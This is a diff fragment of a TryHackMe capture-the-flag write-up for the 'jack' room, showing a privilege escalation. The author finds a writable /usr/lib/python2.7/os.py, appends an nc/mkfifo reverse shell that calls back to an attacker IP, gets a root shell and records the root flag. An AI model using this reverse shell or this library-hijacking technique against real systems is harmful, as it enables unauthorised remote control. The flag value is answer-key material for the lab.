ChrisPritchard/ctf-writeups/tryhackme/jack.md

 11. I couldn't modify the file.
 Nor could I modify any of the source directories python looked into (I checked this with a little bash scripting: `for path in $(python -c 'import sys; print "\n".join(sys.path)'); do namei -l $path ; done`. note the use of `namei -l` to get a full list of file/folder permissions for each entry).
 However I did discover that `os.py` under `/usr/lib/python2.7` *WAS* writable (checked via `for path in $(locate os.py); do namei -l $path; done`).

-12. Adding a python shell to this proved problematic.
-Python shells use functionality from os.py, after all.
-Ultimately, the solution was to open os.py, go to the bottom, and add a new line: `system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.203.251 4444 >/tmp/f')`.
-The nice nc reverse shell for when all you have is nc.openbsd (as was the case on this machine).
+12. Adding a python shell to this proved problematic - python shells typically use functionality *from* `os.py`, after all.
+Ultimately, the solution was to open `os.py`, go to the bottom, and add a new line: `system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.203.251 4444 >/tmp/f')`.
+The nice nc reverse shell for when all you have is `nc.openbsd` (as was the case on this machine).
 I tested this (getting an unpriviliged shell) via `python -c "import os"`

 13. Went back to my attacker machine, opened a reverse listener, and within a minute I had a root shell!
 The final flag at `/root/root.txt` was `b8b63a861cc09e853f29d8055d64bffb`.